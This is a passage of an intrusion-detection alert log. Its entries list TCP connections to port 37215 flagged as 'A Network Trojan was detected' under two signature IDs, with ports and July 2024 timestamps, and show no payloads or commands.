                  Source Port:33148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624232
                  SID:2829579
                  Source Port:44352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.483728
                  SID:2835222
                  Source Port:50090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.876491
                  SID:2829579
                  Source Port:38960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433645
                  SID:2829579
                  Source Port:48420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.383706
                  SID:2829579
                  Source Port:35316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.879518
                  SID:2829579
                  Source Port:49320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.180230
                  SID:2829579
                  Source Port:51822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.330211
                  SID:2829579
                  Source Port:49258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.130042
                  SID:2835222
                  Source Port:37106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.576227
                  SID:2829579
                  Source Port:56156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189899
                  SID:2829579
                  Source Port:41884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.397388
                  SID:2835222
                  Source Port:45112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.163403
                  SID:2829579
                  Source Port:42220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.144364
                  SID:2835222
                  Source Port:52618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.134623
                  SID:2835222
                  Source Port:48668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953541
                  SID:2829579
                  Source Port:34572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.618161
                  SID:2829579
                  Source Port:54880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2835222
                  Source Port:35694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.058453
                  SID:2829579
                  Source Port:50652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171113
                  SID:2835222
                  Source Port:55412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.816955
                  SID:2835222
                  Source Port:48058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.865429
                  SID:2829579
                  Source Port:41494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838932
                  SID:2835222
                  Source Port:48850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.451550
                  SID:2835222
                  Source Port:55202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.908603
                  SID:2829579
                  Source Port:40872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.883057
                  SID:2835222
                  Source Port:54506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.890637
                  SID:2835222
                  Source Port:52518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.804457
                  SID:2835222
                  Source Port:45454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.937517
                  SID:2835222
                  Source Port:48064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.541928
                  SID:2835222
                  Source Port:54706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702659
                  SID:2829579
                  Source Port:42190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.981479
                  SID:2829579
                  Source Port:37828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.498164
                  SID:2835222
                  Source Port:37822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.859810
                  SID:2835222
                  Source Port:45520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838932
                  SID:2835222
                  Source Port:36482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.974934
                  SID:2835222
                  Source Port:55192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.755457
                  SID:2829579
                  Source Port:54478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.191289
                  SID:2835222
                  Source Port:48660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2835222
                  Source Port:56062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.412009
                  SID:2835222
                  Source Port:59404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.718620
                  SID:2835222
                  Source Port:52634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.437142
                  SID:2829579
                  Source Port:39998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.091003
                  SID:2829579
                  Source Port:51956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.441325
                  SID:2829579
                  Source Port:60416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.834981
                  SID:2829579
                  Source Port:60798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.841630
                  SID:2829579
                  Source Port:48144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.284234
                  SID:2835222
                  Source Port:58692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469332
                  SID:2835222
                  Source Port:39306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847797
                  SID:2835222
                  Source Port:58544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.225770
                  SID:2829579
                  Source Port:41136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.479200
                  SID:2835222
                  Source Port:41500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.538525
                  SID:2835222
                  Source Port:57402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.339944
                  SID:2835222
                  Source Port:40700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.209025
                  SID:2829579
                  Source Port:41586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.589721
                  SID:2835222
                  Source Port:56392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915433
                  SID:2829579
                  Source Port:53560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.466916
                  SID:2835222
                  Source Port:36266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505906
                  SID:2835222
                  Source Port:51000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.153820
                  SID:2829579
                  Source Port:39482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.005447
                  SID:2835222
                  Source Port:58040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.930941
                  SID:2835222
                  Source Port:55416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.102730
                  SID:2835222
                  Source Port:34868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.585190
                  SID:2835222
                  Source Port:33052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.179860
                  SID:2829579
                  Source Port:38104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.497334
                  SID:2829579
                  Source Port:49354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.866292
                  SID:2829579
                  Source Port:33786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.520470
                  SID:2829579
                  Source Port:55230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.805928
                  SID:2829579
                  Source Port:37242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.296401
                  SID:2829579
                  Source Port:35014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.420530
                  SID:2829579
                  Source Port:58480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.978564
                  SID:2835222
                  Source Port:36002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985576
                  SID:2829579
                  Source Port:42800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.103599
                  SID:2829579
                  Source Port:54218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.886738
                  SID:2835222
                  Source Port:39780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.768193
                  SID:2835222
                  Source Port:59586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965651
                  SID:2835222
                  Source Port:39310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098304
                  SID:2835222
                  Source Port:50668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.173873
                  SID:2835222
                  Source Port:59808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.405214
                  SID:2829579
                  Source Port:52494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.142588
                  SID:2829579
                  Source Port:38942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358827
                  SID:2835222
                  Source Port:52510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.757846
                  SID:2835222
                  Source Port:40856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2835222
                  Source Port:42684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.617704
                  SID:2835222
                  Source Port:53946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.262926
                  SID:2829579
                  Source Port:39442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.875965
                  SID:2835222
                  Source Port:51612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.284664
                  SID:2829579
                  Source Port:45010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.418170
                  SID:2835222
                  Source Port:59090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.659815
                  SID:2829579
                  Source Port:51318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217232
                  SID:2835222
                  Source Port:50998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281764
                  SID:2835222
                  Source Port:47558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623389
                  SID:2835222
                  Source Port:53168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.862864
                  SID:2835222
                  Source Port:41834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.495859
                  SID:2835222
                  Source Port:59894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.509517
                  SID:2835222
                  Source Port:50982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.676177
                  SID:2835222
                  Source Port:53510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.645814
                  SID:2829579
                  Source Port:52120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633431
                  SID:2829579
                  Source Port:59138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811511
                  SID:2829579
                  Source Port:35260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.553942
                  SID:2829579
                  Source Port:55434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.598591
                  SID:2829579
                  Source Port:59452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.801295
                  SID:2829579
                  Source Port:58974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.021892
                  SID:2835222
                  Source Port:41902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799861
                  SID:2835222
                  Source Port:58324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909610
                  SID:2829579
                  Source Port:44518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.596367
                  SID:2835222
                  Source Port:59920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2835222
                  Source Port:35764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:29.338257
                  SID:2829579
                  Source Port:58380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.918054
                  SID:2835222
                  Source Port:53514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569850
                  SID:2829579
                  Source Port:39250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.668166
                  SID:2835222
                  Source Port:43112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835988
                  SID:2829579
                  Source Port:60686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.628167
                  SID:2829579
                  Source Port:59250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.557326
                  SID:2829579
                  Source Port:59132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488012
                  SID:2829579
                  Source Port:36090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.222774
                  SID:2835222
                  Source Port:41818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.479319
                  SID:2835222
                  Source Port:50836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237467
                  SID:2829579
                  Source Port:52534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.726591
                  SID:2835222
                  Source Port:49668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.923054
                  SID:2829579
                  Source Port:43754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.717108
                  SID:2835222
                  Source Port:56940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.606817
                  SID:2829579
                  Source Port:39082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.438343
                  SID:2835222
                  Source Port:51586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.389134
                  SID:2829579
                  Source Port:55348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.222774
                  SID:2829579
                  Source Port:53628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.591326
                  SID:2835222
                  Source Port:47926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.214564
                  SID:2829579
                  Source Port:59568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.858579
                  SID:2835222
                  Source Port:57350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.660346
                  SID:2835222
                  Source Port:36248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622674
                  SID:2829579
                  Source Port:47370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.123925
                  SID:2829579
                  Source Port:49010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869114
                  SID:2835222
                  Source Port:46278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.801694
                  SID:2829579
                  Source Port:37928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243364
                  SID:2829579
                  Source Port:43314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2829579
                  Source Port:40346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.366132
                  SID:2829579
                  Source Port:48832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.594017
                  SID:2835222
                  Source Port:33902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384932
                  SID:2829579
                  Source Port:33276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.666546
                  SID:2835222
                  Source Port:36794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.475072
                  SID:2835222
                  Source Port:55202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2829579
                  Source Port:59290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2829579
                  Source Port:43332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.143503
                  SID:2835222
                  Source Port:37616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.454232
                  SID:2835222
                  Source Port:48704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.943853
                  SID:2835222
                  Source Port:57006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.176697
                  SID:2829579
                  Source Port:39154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.609280
                  SID:2829579
                  Source Port:39218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.173734
                  SID:2835222
                  Source Port:38546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.358183
                  SID:2829579
                  Source Port:36508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102240
                  SID:2835222
                  Source Port:34530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.018737
                  SID:2835222
                  Source Port:50574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.698988
                  SID:2829579
                  Source Port:34920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.852225
                  SID:2829579
                  Source Port:44916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.175065
                  SID:2829579
                  Source Port:46780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.652052
                  SID:2835222
                  Source Port:36804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.841879
                  SID:2829579
                  Source Port:35308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2835222
                  Source Port:40648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.492988
                  SID:2835222
                  Source Port:48792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.625074
                  SID:2835222
                  Source Port:49138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.190892
                  SID:2835222
                  Source Port:43400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.827027
                  SID:2835222
                  Source Port:45764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.309217
                  SID:2835222
                  Source Port:38808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.545900
                  SID:2835222
                  Source Port:40202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.020440
                  SID:2829579
                  Source Port:40746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.992041
                  SID:2829579
                  Source Port:33224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.160089
                  SID:2829579
                  Source Port:35142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.493465
                  SID:2835222
                  Source Port:49564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.823553
                  SID:2829579
                  Source Port:53624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.060306
                  SID:2829579
                  Source Port:42866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522078
                  SID:2829579
                  Source Port:57978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.973446
                  SID:2835222
                  Source Port:44046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.651213
                  SID:2835222
                  Source Port:53678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.942445
                  SID:2829579
                  Source Port:45632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019424
                  SID:2835222
                  Source Port:56484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.939278
                  SID:2835222
                  Source Port:44250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989941
                  SID:2835222
                  Source Port:37838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.554660
                  SID:2835222
                  Source Port:38646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.041359
                  SID:2835222
                  Source Port:45406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.565173
                  SID:2829579
                  Source Port:39804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.366647
                  SID:2835222
                  Source Port:38998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.800404
                  SID:2835222
                  Source Port:50506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657885
                  SID:2829579
                  Source Port:58780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.535959
